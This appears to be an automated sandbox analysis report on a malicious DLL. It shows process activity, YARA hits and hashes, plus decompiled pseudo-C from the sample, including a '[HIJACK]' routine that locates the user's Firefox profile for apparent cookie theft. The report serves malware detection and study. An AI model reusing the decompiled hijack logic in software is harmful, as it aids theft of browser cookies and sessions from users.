                                                MD5 hash:2D39D4DFDE8F7151723794029AB8A034
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:moderate

                                                Chronological Activities

                                                Analysis Process: rundll32.exe PID: 6652 Parent PID: 6628

                                                General

                                                Start time:14:23:01
                                                Start date:30/01/2021
                                                Path:C:\Windows\SysWOW64\rundll32.exe
                                                Wow64 process (32bit):true
                                                Commandline:rundll32.exe C:\Users\user\Desktop\A8xYhQFvXo.dll,Hello001
                                                Imagebase:0xf50000
                                                File size:61952 bytes
                                                MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000001.00000002.230780419.000000001028B000.00000008.00020000.sdmp, Author: Florian Roth
                                                Reputation:high

                                                Chronological Activities

                                                Analysis Process: WerFault.exe PID: 6708 Parent PID: 6652

                                                General

                                                Start time:14:23:03
                                                Start date:30/01/2021
                                                Path:C:\Windows\SysWOW64\WerFault.exe
                                                Wow64 process (32bit):true
                                                Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6652 -s 712
                                                Imagebase:0x12b0000
                                                File size:434592 bytes
                                                MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high

                                                Chronological Activities

                                                Analysis Process: rundll32.exe PID: 6896 Parent PID: 6628

                                                General

                                                Start time:14:23:05
                                                Start date:30/01/2021
                                                Path:C:\Windows\SysWOW64\rundll32.exe
                                                Wow64 process (32bit):true
                                                Commandline:rundll32.exe C:\Users\user\Desktop\A8xYhQFvXo.dll,Hello002
                                                Imagebase:0xf50000
                                                File size:61952 bytes
                                                MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000004.00000002.236067014.000000001028B000.00000008.00020000.sdmp, Author: Florian Roth
                                                Reputation:high

                                                Chronological Activities

                                                Analysis Process: WerFault.exe PID: 6972 Parent PID: 6896

                                                General

                                                Start time:14:23:06
                                                Start date:30/01/2021
                                                Path:C:\Windows\SysWOW64\WerFault.exe
                                                Wow64 process (32bit):true
                                                Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6896 -s 712
                                                Imagebase:0x12b0000
                                                File size:434592 bytes
                                                MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high

                                                Chronological Activities

                                                Analysis Process: rundll32.exe PID: 7004 Parent PID: 6628

                                                General

                                                Start time:14:23:08
                                                Start date:30/01/2021
                                                Path:C:\Windows\SysWOW64\rundll32.exe
                                                Wow64 process (32bit):true
                                                Commandline:rundll32.exe C:\Users\user\Desktop\A8xYhQFvXo.dll,Hello003
                                                Imagebase:0xf50000
                                                File size:61952 bytes
                                                MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000007.00000002.245505715.000000001028B000.00000008.00020000.sdmp, Author: Florian Roth
                                                Reputation:high

                                                Chronological Activities

                                                Analysis Process: WerFault.exe PID: 7092 Parent PID: 7004

                                                General

                                                Start time:14:23:11
                                                Start date:30/01/2021
                                                Path:C:\Windows\SysWOW64\WerFault.exe
                                                Wow64 process (32bit):true
                                                Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7004 -s 712
                                                Imagebase:0x12b0000
                                                File size:434592 bytes
                                                MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high

                                                Chronological Activities

                                                Disassembly

                                                Code Analysis

                                                Reset < >

                                                  Analysis Process: rundll32.exe PID: 6652 Parent PID: 6628 rundll32.exeCOMMON

                                                  Executed Functions

                                                  Function 101456A0, Relevance: 6.0, APIs: 4, Instructions: 36synchronizationCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E101456A0(CHAR* _a4) {
				struct _SECURITY_DESCRIPTOR _v24;
				int _v28;
				struct _SECURITY_ATTRIBUTES _v40;
				int _v44;
				void* _t19;

				_v44 = 0;
				_v28 = 0;
				InitializeSecurityDescriptor( &_v24, 1);
				SetSecurityDescriptorDacl( &_v24, 1, 0, 0);
				_v40.nLength = 0xc;
				_v40.bInheritHandle = 1;
				_v40.lpSecurityDescriptor =  &_v24;
				_t19 = CreateMutexA( &_v40, 0, _a4); // executed
				_v28 = _t19;
				if(_v28 != 0 && GetLastError() == 0xb7) {
					_v44 = 1;
				}
				return _v44;
			}








                                                  0x101456a6
                                                  0x101456ad
                                                  0x101456ba
                                                  0x101456ca
                                                  0x101456d0
                                                  0x101456d7
                                                  0x101456e1
                                                  0x101456ee
                                                  0x101456f4
                                                  0x101456fb
                                                  0x1014570a
                                                  0x1014570a
                                                  0x10145717

                                                  APIs
                                                  • InitializeSecurityDescriptor.ADVAPI32(?,00000001), ref: 101456BA
                                                  • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,00000000,00000000), ref: 101456CA
                                                  • CreateMutexA.KERNELBASE(0000000C,00000000,10148380), ref: 101456EE
                                                  • GetLastError.KERNEL32 ref: 101456FD
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.230475280.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000001.00000002.230471949.0000000010000000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.230642928.0000000010171000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.230767992.0000000010289000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.230780419.000000001028B000.00000008.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.231392398.0000000010401000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.231410757.0000000010409000.00000002.00020000.sdmp Download File
                                                  Yara matches
                                                  Similarity
                                                  • API ID: DescriptorSecurity$CreateDaclErrorInitializeLastMutex
                                                  • String ID:
                                                  • API String ID: 4085719312-0
                                                  • Opcode ID: e3e17ce41a06682c993a9f935530270e02ade333748fd219aeb766829328ae75
                                                  • Instruction ID: dd95825a369740b842403e6be7ae1189b9f110d36615d86a031ac87e3b427bdb
                                                  • Opcode Fuzzy Hash: e3e17ce41a06682c993a9f935530270e02ade333748fd219aeb766829328ae75
                                                  • Instruction Fuzzy Hash: 2501FB74940309DFEB00DF94CD89BEDBBB5EB08305F600514EA01BA691D7B95A84CBA5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Non-executed Functions

                                                  Function 1014BE00, Relevance: 35.1, APIs: 13, Strings: 7, Instructions: 115COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 82%
                                                  			E1014BE00(void* __edi, void* __eflags, intOrPtr _a4) {
				char _v267;
				char _v268;
				CHAR* _v272;
				intOrPtr _v276;
				char _v539;
				char _v540;
				CHAR* _v544;
				intOrPtr _t42;
				void* _t46;
				void* _t56;
				void* _t76;
				void* _t77;
				void* _t79;
				void* _t80;
				void* _t82;

				_t75 = __edi;
				_v272 = 0;
				_v268 = 0;
				E10025A10(__edi,  &_v267, 0, 0x103);
				__imp__SHGetSpecialFolderPathA(0,  &_v268, 0x1a, 0);
				E10025E1D( &_v268,  &_v268, 0x104, "\\Mozilla\\Firefox\\profiles.ini");
				_t79 = _t77 + 0x18;
				if(PathFileExistsA( &_v268) != 0) {
					_t42 = E10145A40( &_v268);
					_t80 = _t79 + 4;
					_v276 = _t42;
					if(_v276 > 0xa) {
						_v540 = 0;
						E10025A10(_t75,  &_v539, 0, 0x103);
						GetPrivateProfileStringA("Profile0", "Path", 0,  &_v540, 0x104,  &_v268);
						_t46 = E10023280( &_v540);
						_t82 = _t80 + 0x10;
						if(_t46 > 0) {
							_v544 = 0;
							while(1) {
								_t56 = E10023280( &_v540);
								_t82 = _t82 + 4;
								if(_v544 >= _t56) {
									goto L9;
								}
								if( *((char*)(_t76 + _v544 - 0x218)) == 0x2f) {
									 *((char*)(_t76 + _v544 - 0x218)) = 0x5c;
								}
								_v544 =  &(_v544[1]);
							}
						}
						L9:
						PathRemoveFileSpecA( &_v268);
						E10025E1D( &_v268,  &_v268, 0x104, "\\");
						E10025E1D( &_v268,  &_v268, 0x104,  &_v540);
						if(PathFileExistsA( &_v268) != 0) {
							_push( &_v268);
							_push(0x104);
							_push("FirefoxUserPath");
							E10145200(_t75, "[HIJACK][%s][%s][%d]: strFirefoxUserPath = %s\n", PathFindFileNameA(".\\task_cookie\\default_browser.cpp"));
							E100023C0(_a4,  &_v268);
							_v272 = 1;
						}
					}
				}
				return _v272;
			}


















                                                  0x1014be00
                                                  0x1014be09
                                                  0x1014be13
                                                  0x1014be28
                                                  0x1014be3d
                                                  0x1014be54
                                                  0x1014be59
                                                  0x1014be6b
                                                  0x1014be78
                                                  0x1014be7d
                                                  0x1014be80
                                                  0x1014be8d
                                                  0x1014be93
                                                  0x1014bea8
                                                  0x1014becf
                                                  0x1014bedc
                                                  0x1014bee1
                                                  0x1014bee6
                                                  0x1014bee8
                                                  0x1014bf03
                                                  0x1014bf0a
                                                  0x1014bf0f
                                                  0x1014bf18
                                                  0x00000000
                                                  0x00000000
                                                  0x1014bf2b
                                                  0x1014bf33
                                                  0x1014bf33
                                                  0x1014befd
                                                  0x1014befd
                                                  0x1014bf03
                                                  0x1014bf3d
                                                  0x1014bf44
                                                  0x1014bf5b
                                                  0x1014bf76
                                                  0x1014bf8d
                                                  0x1014bf95
                                                  0x1014bf96
                                                  0x1014bf9b
                                                  0x1014bfb1
                                                  0x1014bfc3
                                                  0x1014bfc8
                                                  0x1014bfc8
                                                  0x1014bf8d
                                                  0x1014be8d
                                                  0x1014bfdb

                                                  APIs
                                                  • _memset.LIBCMT ref: 1014BE28
                                                  • SHGetSpecialFolderPathA.SHELL32(00000000,?,0000001A,00000000), ref: 1014BE3D
                                                  • _strcat_s.LIBCMT ref: 1014BE54
                                                  • PathFileExistsA.SHLWAPI(?), ref: 1014BE63
                                                    • Part of subcall function 10145A40: FindFirstFileA.KERNEL32(1014BE7D,?), ref: 10145A5E
                                                    • Part of subcall function 10145A40: FindClose.KERNEL32(000000FF), ref: 10145A86
                                                  • _memset.LIBCMT ref: 1014BEA8
                                                  • GetPrivateProfileStringA.KERNEL32(Profile0,Path,00000000,?,00000104,?), ref: 1014BECF
                                                  • _strlen.LIBCMT ref: 1014BEDC
                                                  • _strlen.LIBCMT ref: 1014BF0A
                                                  • PathRemoveFileSpecA.SHLWAPI(?), ref: 1014BF44
                                                  • _strcat_s.LIBCMT ref: 1014BF5B
                                                  • _strcat_s.LIBCMT ref: 1014BF76
                                                  • PathFileExistsA.SHLWAPI(?), ref: 1014BF85
                                                  • PathFindFileNameA.SHLWAPI(.\task_cookie\default_browser.cpp,FirefoxUserPath,00000104,?), ref: 1014BFA5
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.230475280.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000001.00000002.230471949.0000000010000000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.230642928.0000000010171000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.230767992.0000000010289000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.230780419.000000001028B000.00000008.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.231392398.0000000010401000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.231410757.0000000010409000.00000002.00020000.sdmp Download File
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FilePath$Find_strcat_s$Exists_memset_strlen$CloseFirstFolderNamePrivateProfileRemoveSpecSpecialString
                                                  • String ID: .\task_cookie\default_browser.cpp$FirefoxUserPath$Path$Profile0$[HIJACK][%s][%s][%d]: strFirefoxUserPath = %s$\$\Mozilla\Firefox\profiles.ini
                                                  • API String ID: 261838357-2048179301
                                                  • Opcode ID: 61ff19aa0bb1e31c4214e411524ec3c5b638b2acafb5d465548dd44bc976a712
                                                  • Instruction ID: 5c61fa6741f18a0e6eb4d6f31c1c38185a34881f3851f4e82b563baab361f6ea
                                                  • Opcode Fuzzy Hash: 61ff19aa0bb1e31c4214e411524ec3c5b638b2acafb5d465548dd44bc976a712
                                                  • Instruction Fuzzy Hash: EC4180B9D4021C9BDB50DB60DCCABDA7338EB24700F5045D4FA49A6191EBB56BC8CF91
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 10147900, Relevance: 33.4, APIs: 18, Strings: 1, Instructions: 132fileCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E10147900(void* __ebx, void* __edi, void* __esi, char* _a4, intOrPtr _a8, intOrPtr _a12) {
				struct _WIN32_FIND_DATAA _v324;
				char _v587;
				char _v588;
				char _v852;
				char _v1115;
				char _v1116;
				void* _v1120;
				int _t36;
				void* _t43;
				int _t45;
				int _t56;
				void* _t65;
				void* _t88;
				void* _t89;
				void* _t93;

				_t88 = __esi;
				_t87 = __edi;
				_t65 = __ebx;
				_t36 = PathFileExistsA(_a4);
				if(_t36 == 0) {
					return _t36;
				}
				_v588 = 0;
				E10025A10(__edi,  &_v587, 0, 0x103);
				_v1116 = 0;
				E10025A10(_t87,  &_v1115, 0, 0x103);
				E10025A8A( &_v1115,  &_v588, 0x104, _a4);
				E10025E1D( &_v588,  &_v588, 0x104, "\\*.*");
				_t93 = _t89 + 0x30;
				_t43 = FindFirstFileA( &_v588,  &_v324);
				_v1120 = _t43;
				__eflags = _v1120 - 0xffffffff;
				if(_v1120 == 0xffffffff) {
					return _t43;
				} else {
					do {
						__eflags = _v324.dwFileAttributes & 0x00000010;
						if((_v324.dwFileAttributes & 0x00000010) != 0) {
							__eflags = _v324.cFileName - 0x2e;
							if(_v324.cFileName != 0x2e) {
								E10025A10(_t87,  &_v1116, 0, 0x104);
								E10025A8A(_a4,  &_v1116, 0x104, _a4);
								E10025E1D(_a4,  &_v1116, 0x104, "\\");
								E10025E1D( &(_v324.cFileName),  &_v1116, 0x104,  &(_v324.cFileName));
								E10025E1D( &(_v324.cFileName),  &_v1116, 0x104, "\\");
								E10025E1D(_a12,  &_v1116, 0x104, _a12);
								_t93 = _t93 + 0x48;
								_t56 = PathFileExistsA( &_v1116);
								__eflags = _t56;
								if(_t56 != 0) {
									PathRemoveFileSpecA( &_v1116);
									E10025A10(_t87,  &_v852, 0, 0x104);
									E10023600(_t65, _t87, _t88,  &_v852,  &_v1116, E10023280( &_v1116));
									_t93 = _t93 + 0x1c;
									E10002550(_a8,  &_v1116, __eflags,  &_v852);
								}
							}
						}
						_t45 = FindNextFileA(_v1120,  &_v324);
						__eflags = _t45;
					} while (_t45 != 0);
					return FindClose(_v1120);
				}
			}


















                                                  0x10147900
                                                  0x10147900
                                                  0x10147900
                                                  0x1014790d
                                                  0x10147915
                                                  0x00000000
                                                  0x00000000
                                                  0x1014791c
                                                  0x10147931
                                                  0x10147939
                                                  0x1014794e
                                                  0x10147966
                                                  0x1014797f
                                                  0x10147984
                                                  0x10147995
                                                  0x1014799b
                                                  0x101479a1
                                                  0x101479a8
                                                  0x10147af7
                                                  0x101479ae
                                                  0x101479ae
                                                  0x101479b4
                                                  0x101479b7
                                                  0x101479c4
                                                  0x101479c7
                                                  0x101479db
                                                  0x101479f3
                                                  0x10147a0c
                                                  0x10147a27
                                                  0x10147a40
                                                  0x10147a58
                                                  0x10147a5d
                                                  0x10147a67
                                                  0x10147a6d
                                                  0x10147a6f
                                                  0x10147a7a
                                                  0x10147a8e
                                                  0x10147ab4
                                                  0x10147ab9
                                                  0x10147ac6
                                                  0x10147ac6
                                                  0x10147a6f
                                                  0x101479c7
                                                  0x10147ad9
                                                  0x10147adf
                                                  0x10147adf
                                                  0x00000000
                                                  0x10147aee

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.230475280.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000001.00000002.230471949.0000000010000000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.230642928.0000000010171000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.230767992.0000000010289000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.230780419.000000001028B000.00000008.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.231392398.0000000010401000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.231410757.0000000010409000.00000002.00020000.sdmp Download File
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _strcat_s$File$Find_memset$ExistsPath_strcpy_s$CloseFirstNext
                                                  • String ID: \*.*
                                                  • API String ID: 3182140180-1173974218
                                                  • Opcode ID: 1f2e2a1f41dc3129687c67fed6cbad1ed6dc025b9d27629ebaed0d5e2a7ab81e
                                                  • Instruction ID: 50026323fc2088205c94d2414016c69e68ee20f80ede7d099e469dfed23808c1
                                                  • Opcode Fuzzy Hash: 1f2e2a1f41dc3129687c67fed6cbad1ed6dc025b9d27629ebaed0d5e2a7ab81e
                                                  • Instruction Fuzzy Hash: 2841B2F58006146BDB14DBA0DC86FDE7338EB44701F5486D8F709A6092EB75AB888FA5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 10145D10, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 57timeCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 87%
                                                  			E10145D10(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				struct _FILETIME _v12;
				short _v14;
				short _v16;
				short _v18;
				short _v20;
				short _v22;
				short _v26;
				char _v28;
				SYSTEMTIME* _v32;
				intOrPtr _v36;
				struct _SYSTEMTIME _v52;
				intOrPtr _v56;
				struct _FILETIME _v64;
				SYSTEMTIME* _t43;

				_t45 = __edi;
				_v56 = E100253AE(__ebx, __edx, __edi, __esi, 0x14);
				E10025A10(__edi, _v56, 0, 0x14);
				_v28 = 0x7b2;
				_v26 = 1;
				_v22 = 1;
				_v20 = 0;
				_v18 = 0;
				_v16 = 0;
				_v14 = 0;
				GetSystemTime( &_v52);
				SystemTimeToFileTime( &_v52,  &_v12);
				_t43 =  &_v28;
				SystemTimeToFileTime(_t43,  &_v64);
				asm("sbb ecx, [ebp-0x38]");
				_v36 = E1002BC50(_v12.dwLowDateTime - _v64.dwLowDateTime, _v12.dwHighDateTime, 0x2710, 0);
				_v32 = _t43;
				_push(_v32);
				L10023965(_t45, _v56, "%lld", _v36);
				return _v56;
			}

















                                                  0x10145d10
                                                  0x10145d20
                                                  0x10145d2b
                                                  0x10145d33
                                                  0x10145d39
                                                  0x10145d3f
                                                  0x10145d45
                                                  0x10145d4b
                                                  0x10145d51
                                                  0x10145d57
                                                  0x10145d61
                                                  0x10145d6f
                                                  0x10145d79
                                                  0x10145d7d
                                                  0x10145d8c
                                                  0x10145d9d
                                                  0x10145da0
                                                  0x10145da6
                                                  0x10145db4
                                                  0x10145dc2

                                                  APIs
                                                  • _malloc.LIBCMT ref: 10145D18
                                                    • Part of subcall function 100253AE: __FF_MSGBANNER.LIBCMT ref: 100253D1
                                                    • Part of subcall function 100253AE: __NMSG_WRITE.LIBCMT ref: 100253D8
                                                    • Part of subcall function 100253AE: HeapAlloc.KERNEL32(00000000,1002359C,?,00000003,?,?,100235AB,00000000,10001F33,00000000,00000000), ref: 10025426
                                                  • _memset.LIBCMT ref: 10145D2B
                                                  • GetSystemTime.KERNEL32(?), ref: 10145D61
                                                  • SystemTimeToFileTime.KERNEL32(?,?), ref: 10145D6F
                                                  • SystemTimeToFileTime.KERNEL32(000007B2,?), ref: 10145D7D
                                                  • __aulldiv.LIBCMT ref: 10145D98
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.230475280.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000001.00000002.230471949.0000000010000000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.230642928.0000000010171000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.230767992.0000000010289000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.230780419.000000001028B000.00000008.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.231392398.0000000010401000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.231410757.0000000010409000.00000002.00020000.sdmp Download File
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Time$System$File$AllocHeap__aulldiv_malloc_memset
                                                  • String ID: %lld
                                                  • API String ID: 860742876-1962030014
                                                  • Opcode ID: 700ef544f816ee661cfc2d3abde6fe991a915025cd6f6b942d8576967d139f22
                                                  • Instruction ID: 16619ae10d9e8943b6d3f63e1c79c489d59666ec1cc21348ff4a954b40909d96
                                                  • Opcode Fuzzy Hash: 700ef544f816ee661cfc2d3abde6fe991a915025cd6f6b942d8576967d139f22
                                                  • Instruction Fuzzy Hash: 65110AB5D11209ABDF04DBE4D88AEEEB7B9FF44304F004508FA05BB251E7796644CB95
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 10028D22, Relevance: 7.6, APIs: 5, Instructions: 57COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 85%
                                                  			E10028D22(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
				intOrPtr _v0;
				void* _v804;
				intOrPtr _v808;
				intOrPtr _v812;
				intOrPtr _t6;
				intOrPtr _t12;
				intOrPtr _t13;
				long _t17;
				intOrPtr _t21;
				intOrPtr _t22;
				intOrPtr _t25;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr* _t31;
				void* _t34;

				_t27 = __esi;
				_t26 = __edi;
				_t25 = __edx;
				_t22 = __ecx;
				_t21 = __ebx;
				_t6 = __eax;
				_t34 = _t22 -  *0x102896c4; // 0x706cca93
				if(_t34 == 0) {
					asm("repe ret");
				}
				 *0x10402078 = _t6;
				 *0x10402074 = _t22;
				 *0x10402070 = _t25;
				 *0x1040206c = _t21;
				 *0x10402068 = _t27;
				 *0x10402064 = _t26;
				 *0x10402090 = ss;
				 *0x10402084 = cs;
				 *0x10402060 = ds;
				 *0x1040205c = es;
				 *0x10402058 = fs;
				 *0x10402054 = gs;
				asm("pushfd");
				_pop( *0x10402088);
				 *0x1040207c =  *_t31;
				 *0x10402080 = _v0;
				 *0x1040208c =  &_a4;
				 *0x10401fc8 = 0x10001;
				 *0x10401f7c =  *0x10402080;
				 *0x10401f70 = 0xc0000409;
				 *0x10401f74 = 1;
				_t12 =  *0x102896c4; // 0x706cca93
				_v812 = _t12;
				_t13 =  *0x102896c8; // 0x8f93356c
				_v808 = _t13;
				 *0x10401fc0 = IsDebuggerPresent();
				_push(1);
				E1002B605(_t14);
				SetUnhandledExceptionFilter(0);
				_t17 = UnhandledExceptionFilter(0x10172a28);
				if( *0x10401fc0 == 0) {
					_push(1);
					E1002B605(_t17);
				}
				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
			}


















                                                  0x10028d22
                                                  0x10028d22
                                                  0x10028d22
                                                  0x10028d22
                                                  0x10028d22
                                                  0x10028d22
                                                  0x10028d22
                                                  0x10028d28
                                                  0x10028d2a
                                                  0x10028d2a
                                                  0x100348e5
                                                  0x100348ea
                                                  0x100348f0
                                                  0x100348f6
                                                  0x100348fc
                                                  0x10034902
                                                  0x10034908
                                                  0x1003490f
                                                  0x10034916
                                                  0x1003491d
                                                  0x10034924
                                                  0x1003492b
                                                  0x10034932
                                                  0x10034933
                                                  0x1003493c
                                                  0x10034944
                                                  0x1003494c
                                                  0x10034957
                                                  0x10034966
                                                  0x1003496b
                                                  0x10034975
                                                  0x1003497f
                                                  0x10034984
                                                  0x1003498a
                                                  0x1003498f
                                                  0x1003499b
                                                  0x100349a0
                                                  0x100349a2
                                                  0x100349aa
                                                  0x100349b5
                                                  0x100349c2
                                                  0x100349c4
                                                  0x100349c6
                                                  0x100349cb
                                                  0x100349df

                                                  APIs
                                                  • IsDebuggerPresent.KERNEL32 ref: 10034995
                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 100349AA
                                                  • UnhandledExceptionFilter.KERNEL32(10172A28), ref: 100349B5
                                                  • GetCurrentProcess.KERNEL32(C0000409), ref: 100349D1
                                                  • TerminateProcess.KERNEL32(00000000), ref: 100349D8
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.230475280.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000001.00000002.230471949.0000000010000000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.230642928.0000000010171000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.230767992.0000000010289000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.230780419.000000001028B000.00000008.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.231392398.0000000010401000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.231410757.0000000010409000.00000002.00020000.sdmp Download File
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                  • String ID:
                                                  • API String ID: 2579439406-0
                                                  • Opcode ID: 7d7a95392daed21562f0adf87457f4944839031e0dd746fb079cb8030c60dc8b
                                                  • Instruction ID: b0bfddbdfe7abc5bd73f111c0b54b42900f0f8aba0d5a76ddfc3178f72c6c3ae
                                                  • Opcode Fuzzy Hash: 7d7a95392daed21562f0adf87457f4944839031e0dd746fb079cb8030c60dc8b
                                                  • Instruction Fuzzy Hash: 9F21CEB8911326DFE301DF28DBC8A853BF5FB08315F40412AEA08A76B9E7749985CF15
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 10145A40, Relevance: 3.0, APIs: 2, Instructions: 21fileCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E10145A40(CHAR* _a4) {
				struct _WIN32_FIND_DATAA _v324;
				intOrPtr _v328;
				void* _v332;

				_v328 = 0;
				_v332 = FindFirstFileA(_a4,  &_v324);
				if(_v332 != 0xffffffff) {
					_v328 = _v324.nFileSizeLow;
				}
				FindClose(_v332);
				return _v328;
			}






                                                  0x10145a49
                                                  0x10145a64
                                                  0x10145a71
                                                  0x10145a79
                                                  0x10145a79
                                                  0x10145a86
                                                  0x10145a95

                                                  APIs
                                                  • FindFirstFileA.KERNEL32(1014BE7D,?), ref: 10145A5E
                                                  • FindClose.KERNEL32(000000FF), ref: 10145A86
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.230475280.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000001.00000002.230471949.0000000010000000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.230642928.0000000010171000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.230767992.0000000010289000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.230780419.000000001028B000.00000008.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.231392398.0000000010401000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.231410757.0000000010409000.00000002.00020000.sdmp Download File
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Find$CloseFileFirst
                                                  • String ID:
                                                  • API String ID: 2295610775-0
                                                  • Opcode ID: c9b70743daf889077228f2f50b5fd2014dcaf1e28faea37e84fc76739474dd9e
                                                  • Instruction ID: 9d44e6e2c7ddc49a73667ea1faf6e7adb3551f7bb64662363438a22e81cceeee
                                                  • Opcode Fuzzy Hash: c9b70743daf889077228f2f50b5fd2014dcaf1e28faea37e84fc76739474dd9e
                                                  • Instruction Fuzzy Hash: FEF0A5789002289BCB70DF68CD88BDDB7B9AB08310F2002D5E91DA32B1DA349E958F50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 10042F70, Relevance: .5, Instructions: 479COMMONCrypto
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E10042F70(void* __eax, signed char* __ecx, signed char* _a4) {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				signed char* _v20;
				intOrPtr _t158;
				unsigned int _t162;
				signed int _t165;
				signed int _t166;
				intOrPtr _t167;
				signed int _t168;
				signed int _t169;
				signed char* _t170;
				signed int _t172;
				signed char* _t173;
				signed char* _t176;
				signed char* _t178;
				signed char* _t180;
				signed char _t191;
